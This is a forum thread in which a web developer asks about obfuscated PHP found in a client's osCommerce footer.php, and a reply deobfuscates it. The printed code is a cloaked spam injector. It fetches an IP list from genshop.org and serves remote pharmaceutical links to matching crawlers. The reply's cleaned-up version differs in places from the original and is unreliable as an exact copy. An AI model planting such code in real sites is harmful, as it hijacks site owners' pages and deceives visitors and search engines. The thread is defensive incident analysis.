I'm looking at a site that has been exploited by someone/something. The site has had a bunch of links injected into it's footer that links to pharmaceutical pitches, and who knows what else. There are/were a lot of links right at the top of the footer. I can only find these now, on the cached pages in the Yahoo index. Google is still not happy w/ the site though, and the live site does not show any links anymore. This is for a client..so I mostly know what I was told, and what I can find else wise.
I found this code at the very 'tip/top' of the footer.php (it's an OsCommerse Site):
<?php $x13="cou\156\x74"; $x14="\x65\x72\162\x6fr\x5f\x72ep\157\162\164ing"; $x15="\146\151l\x65"; $x16="\146i\154\145_g\x65t\x5f\x63\x6fn\164\145n\164s"; $x17="\163\x74rle\156"; $x18="\163tr\160o\x73"; $x19="su\x62\x73\164\162"; $x1a="tr\151m";
ini_set(' display_errors','off');$x14(0);$x0b = "\150t\x74p\x3a\057\057\x67\145n\x73h\157\x70\056org/\163\x63\162ipt\057\155a\163k\x2e\x74x\x74";$x0c = $x0b; $x0d = $_SERVER["\x52E\115O\124\105_A\104\104\122"]; $x0e = @ $x15($x0c); for ( $x0f = 0; $x0f < $x13($x0e); $x0f++ ) {$x10 = $x1a($x0e[$x0f]);if ( $x10 != "" ){ if ( ($x11 = $x18($x10, "*")) !== false ) $x10 = $x19($x10, 0,$x11); if ( $x17($x10) <= $x17($x0d) && $x18($x0d, $x10) === 0 ) { $x12 =$x16("\150\164\164\160\x3a/\057g\145\x6e\x73\x68o\160\056o\162\x67\057\160aral\x69\x6e\x6b\x73\x2f\156e\167\x2f3\057\x66\145e\144\x72\157lle\x72\x2e\143\x6f\x6d\x2e\x74\170\x74"); echo "$x12"; } }}echo "\x3c\041\055\x2d \060\x36\071\x63\x35b4\x66e5\060\062\067\146\x39\x62\0637\x64\x653\x31d2be5\145\141\143\066\x37\040\x2d-\076";?>
When I view the source cached pages that have the 'Bad' links, this code fits right in where I found it in the footer.php source. A little research on google show that there are exploits out there w/ similar code.
What do you think, when I run it on my own server all I get is the echoed comment in the source only like so:
<!-- 069c5b4fe5027f9b37de31d2be5eac67 -->
I don't want to just hastily remove the code and say 'your good' just because it looks bad, especially because I have no immediate way of knowing that the 'bad links' are gone. BTW, the links all go to a dead URL.
You can see the bad pages still cached at Yahoo:,d5f14ae5&icp=1&.intl=us&sig=Ifqk1OuvHXNcZnGgPR9PbA--
here's the unobfuscated script (more or less)
it's just dumping the contents of this url onto your page
it also checks the remote_addr against a list of IPs (google, et al) to try to remain undetected.
looks like you're being attaced by genshop.com
$count="cou\156\x74"; // count
$error_reporting="\x65\x72\162\x6fr\x5f\x72ep\157\162\164ing"; // error_reporting
$file="\146\151l\x65"; // file
$file_get_contents="\146i\154\145_g\x65t\x5f\x63\x6fn\164\145n\164s"; // file_get_contents
$strlen="\163\x74rle\156"; // strlen
$strpos="\163tr\160o\x73"; // strpos
$substr="su\x62\x73\164\162"; // substr
$trim="tr\151m"; //trim
ini_set(' display_errors','off');
$x0b = "http://genshop.org/scripts/mask.txt";
$url = $x0b;
$tmp = "REMOTE_ADDR";
$x0d = $_SERVER[$tmp];
$tmp_filename = "http://genshop.org/paralinks/new/3/feedroller.com.txt";
$IPs = @ $file($url);
for ( $i = 0; $i < $count($IPs); $i++ ) {
$curr_ip = $trim($ips[$i]);
if ( $curr_ip != "" ) {
if ( ($x11 = $strpos($curr_ip, "*")) !== false )
$curr_ip = $substr($curr_ip, 0,$x11);
// check visitor ip against mask list
if ( $strlen($curr_ip) <= $strlen($x0d) && $strpos($x0d, $curr_ip) === 0 ) {
$x12 = $file_get_content($tmp_filename);
echo "$x12";
// print spam contents
echo $curr_ip;
$tmp2 = "\x3c\041\055\x2d \060\x36\071\x63\x35b4\x66e5\060\062\067\146\x39\x62\0637\x64\x653\x31d2be5\145\141\143\066\x37\040\x2d-\076";
echo $tmp2;